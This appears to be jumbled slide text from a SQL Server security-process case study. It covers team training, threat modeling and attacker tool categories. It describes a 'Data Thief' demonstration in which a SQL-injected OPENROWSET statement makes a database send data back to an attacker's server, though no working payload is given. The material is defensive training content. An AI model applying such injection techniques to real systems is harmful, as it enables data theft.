Separate bug tracking DB for tracking file reviews.On demand webcasts (search on security):.more detail on important security related topics.Video tape training for new team members.Threat modeling, hacker/cracker tools, black hat community, security development & test tools, attack vectors & defense.Mandatory training for Architects, PMs, Developers & Testers.Security training for every team member.Web site set up for general announcements & communication.Motivation, goals, approach, process, fix bar,….Don’t start security push until team is prepared.Learning from other teams’ experiences.Threat driven reviews & testing Preparation Phase Security Push Push Follow-on 5/1/203.Goal full 800 person team productive from start. Girish ChanderSQL Server Security PM Data Thief Demonstration Author: Cesar Cerrudo Database Vulnerable Application Local DB SQL injected OPENROWSET statement causes remote DB to connect back to attackers DB, sending back useful data Know Your Enemy Port Scanners Black Hat Community Sharing Brute Force pwd crackers Cracker Tools Network Sniffers Dictionary Based pwd crackers De-compilers Debuggersĭata Thief Architecture Attack string Form values appended with extra SQL statement SQL-Injected query Contains an OPENROWSET statement App. Issue: disruption, DOS, loss of data, misuse, damage, loss of confidentiality Source:.Incident: single security issue grouping together all impacts of that that issue.CERT/CC incident statistics 1988 through 2003.Security Process & You:SQL Server Case Study James Hamilton General Manager SQL Server Webdata Development & Security Architect
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |